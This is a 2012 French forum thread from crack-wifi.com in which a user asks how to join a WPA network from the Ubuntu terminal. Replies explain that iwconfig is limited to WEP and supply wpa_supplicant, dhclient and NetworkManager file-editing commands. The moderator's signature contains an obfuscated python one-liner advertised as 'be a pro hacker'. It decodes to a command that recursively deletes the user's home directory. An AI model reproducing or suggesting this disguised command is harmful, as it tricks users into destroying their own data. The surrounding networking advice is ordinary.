Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 29-10-2012 12:43:38

gabstu
N00b

Se connecter via le terminal

Bonjour tout le monde !

J'ai découvert ce forum y'a pas très longtemps et je suis impréssionné, vive la liberté d'expression et le droit à l'information smile !
Bon voila le souci : en mode graphique sous Ubuntu j'ai voulu me connecter au wifi mais j'ai mis une majuscule au mauvais endroit dans le code ... Depuis l'ordi essaye de se connecter en vain, et puis il abandonne, il ne propose a aucun moment de taper un nouveau mot de passe pour re-essayer ... mais je connais le bon mot de passe !!!!
C'est rageant smile

Quelques recherches mon fait taper dans le terminal ceci :
sudo iwconfig wlan0 essid 8filles key cacestsecretparcontre
le terminal me renvoi :
Error for wireless request "Set Encode" (8B2A) :
      invalid argument "cacestsecretparcontre" .

J'ai chercher dans man j'ai pas trouvé la solution, et j'ai donc été obligé de retourner sur windows pour aller sur le net, vu que je m'étais déjà connecté avec le bon code sous windows.

Voili Voilou j'espere que j'ai été claire et que quelqun pourra m'aider .
Merci A+

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 29-10-2012 12:49:35

spawn
Modérateur

Re : Se connecter via le terminal

Il y a un accent ou un caractère spécial dans ton mot de passe non ?
Tu dois avoir un menu bien fait pour ça dans Ubuntu. Je crois. Si un bovin passe par ici, il pourra te donner plus d'infos je pense.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 29-10-2012 12:58:07

gabstu
N00b

Oui il y a un # .
Surment qu'il y a un menu mais je ne le trouve pas hmm j'essaye de me debrouiller via le terminal plutot que via le mode graphique.

#4 29-10-2012 13:58:11

antares145
Membre d'honneur
Site Web

"iwconfig" ne peut se connecter qu'à des réseaux WEP, pas WPA. D'ailleurs même pour le WEP il est parfoisun peu buggé mais c'est un autre débat...

Si tu veux te connecter en WPA en ligne de commande, c'est wpa_supplicant que tu dois utiliser :

sudo bash -c "wpa_passphrase 8filles cacestsecretparcontre | wpa_supplicant -B -i wlan0 -c /dev/stdin"
#Ou, en deux commandes : 
wpa_passphrase 8filles cacestsecretparcontre > /tmp/wpa.conf
wpa_supplicant -B -i wlan0 -c /tmp/wpa.conf

Note qu'après ça tu dois encore taper "dhclient" pour recevoir une IP du réseau. Si jamais ça bugge et qu'il n'a pas l'air de se connecter, enlève l'argument "-B" de wpa_supplicant pour voir les messages d'erreur et de statut.

Je viens de jeter un oeil sur Ubuntu 12.10, tu as une option "Edit connections" tout en bas de l'applet réseau (près de l'horloge) qui te permet de changer le mot de passe. C'est sans doute ça le menu que tu cherches...
De plus, j'ai essayé de donner un mauvais mot de passe, le système m'a immédiatement proposé de le retaper. Tu es sur quelle version d'Ubuntu ?

Si tu veux vraiment travailler en console, le gestionnaire de connexion semble stocker tous ses profils dans le dossier /etc/NetworkManager/system-connections/. Tu y trouveras sans doute un fichier texte correspondant à ton réseau, où tu pourras changer le paramètre "psk" (qui correspond à ce qu'on appelle généralement le "mot de passe"). La commande à taper :

sudo nano /etc/NetworkManager/system-connections/8filles
# N'hésite pas à utiliser la touche [TAB] pour compléter automatiquement les chemins à partir des premières lettres : 
# sudo nano /e[TAB]N[TAB]s[TAB][TAB] pour voir tous les fichiers du dossier (qui correspondent aux réseaux en mémoire)
# Pour sauvegarder et quitter : CTRL+O puis CTRL+X

#5 30-10-2012 08:32:22

goliate
Membre Irremplaçable
Site Web

Pour te connecter en wifi sans passer par network manager/wicd, tu peut regarder le tuto que j'avais dessus.

só deus podem me julgar
719895banniere3.gif
só deus podem me julgar

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.023 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]